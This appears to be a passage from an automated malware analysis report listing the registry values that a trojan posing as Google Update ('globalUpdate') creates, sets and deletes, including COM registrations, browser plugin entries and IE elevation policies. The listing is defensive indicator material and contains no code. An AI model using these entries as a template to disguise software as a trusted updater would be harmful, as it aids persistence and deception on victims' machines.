[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1411237389"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 B0 12 A2 1C 69 EA 46 A3 B4 59 A1 27 AA 3F EE"
[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"
[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
The process GoogleUpdate.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"
[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 53 0E 28 8B EF 63 55 A2 B2 5B 42 A2 82 EE 78"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"
[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"
[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"
[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"
